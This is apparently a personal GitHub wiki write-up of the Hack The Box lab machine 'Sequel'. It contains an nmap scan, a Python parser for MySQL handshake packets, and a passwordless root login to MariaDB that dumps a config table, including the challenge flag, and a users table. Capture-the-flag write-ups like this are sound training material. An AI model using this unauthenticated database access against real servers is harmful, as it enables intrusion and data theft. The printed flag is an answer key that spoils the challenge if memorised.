HTB_Sequel - meruneru/tech_memo GitHub Wiki

Machine - Sequel

Introductory machine

A #SQL challenge. #MySQL is in use.

port scan

#Port 3306 appears to be a #MySQL server.

┌─[htb-meruneru@htb-zs1gibg6pb]─[~]
└─── $nmap -sV -sC -Pn 10.129.182.210
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-13 04:02 UTC
Nmap scan report for 10.129.182.210
Host is up (0.079s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 90
|   Capabilities flags: 63486
|   Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, InteractiveClient, SupportsTransactions, IgnoreSpaceBeforeParenthesis, SupportsCompression, DontAllowDatabaseTableColumn, LongColumnFlag, FoundRows, Speaks41ProtocolNew, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: (nv&Wer2@(Hs*u12HTKZ
|_  Auth Plugin Name: mysql_native_password
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.11 seconds
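
The mysql-info fields in the scan above are read from the server's initial greeting packet (protocol version 10). The following is an added example, not part of the original memo: it parses a greeting constructed from the values nmap printed and reports whether the server offers TLS. The charset byte and the upper capability word do not appear in the scan output and are assumed.

```python
import struct

# Capability and status bits from the MySQL/MariaDB client-server protocol.
CLIENT_SSL = 0x0800
CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x00080000
SERVER_STATUS_AUTOCOMMIT = 0x0002


def build_sample_greeting():
    """Constructed greeting built from the values in the nmap output above.
    Charset (45) and upper capability word (0x000F) are assumptions."""
    salt = b"(nv&Wer2@(Hs*u12HTKZ"
    body = bytes([10]) + b"5.5.5-10.3.27-MariaDB-0+deb10u1\x00"
    body += struct.pack("<I", 90) + salt[:8] + b"\x00"
    body += struct.pack("<HBHHB", 63486, 45, SERVER_STATUS_AUTOCOMMIT, 0x000F, 21)
    body += b"\x00" * 10 + salt[8:] + b"\x00" + b"mysql_native_password\x00"
    return struct.pack("<I", len(body))[:3] + b"\x00" + body


def parse_greeting(packet):
    """Parse a HandshakeV10 packet (4-byte header + payload) into a dict."""
    length = int.from_bytes(packet[:3], "little")
    p = packet[4:4 + length]
    if len(p) != length or p[:1] != b"\x0a":
        raise ValueError("truncated packet or not protocol version 10")
    end = p.index(b"\x00", 1)          # server version is NUL-terminated
    version = p[1:end].decode("ascii", "replace")
    pos = end + 1
    thread_id, = struct.unpack_from("<I", p, pos)
    salt = p[pos + 4:pos + 12]         # first 8 bytes of the auth salt
    pos += 13                          # thread id (4) + salt part 1 (8) + filler (1)
    cap_lo, charset, status, cap_hi, auth_len = struct.unpack_from("<HBHHB", p, pos)
    caps = cap_lo | (cap_hi << 16)
    pos += 8 + 10                      # fixed fields (8) + reserved bytes (10)
    plugin = None
    if caps & CLIENT_SECURE_CONNECTION:
        part2 = max(13, auth_len - 8)  # remaining salt plus trailing NUL
        salt += p[pos:pos + part2 - 1]
        pos += part2
    if caps & CLIENT_PLUGIN_AUTH:
        plugin = p[pos:].split(b"\x00", 1)[0].decode("ascii")
    return {"version": version, "thread_id": thread_id, "salt": salt,
            "caps_low": cap_lo, "tls_offered": bool(caps & CLIENT_SSL),
            "autocommit": bool(status & SERVER_STATUS_AUTOCOMMIT), "plugin": plugin}


if __name__ == "__main__":
    print(parse_greeting(build_sample_greeting()))
```

With the capability value 63486 from the scan, the CLIENT_SSL bit is clear, which is consistent with the failed ssl-cert and tls-* scripts: this server does not offer TLS on 3306.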

Enumeration

Nothing in particular.

Access

$mysql -u root -h 10.129.182.210

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.082 sec)

MariaDB [(none)]>
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.080 sec)

MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.080 sec)

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.080 sec)

MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email            |
+----+----------+------------------+
|  1 | admin    | [email protected] |
|  2 | lara     | [email protected]  |
|  3 | sam      | [email protected]   |
|  4 | mary     | [email protected]  |
+----+----------+------------------+
4 rows in set (0.080 sec)
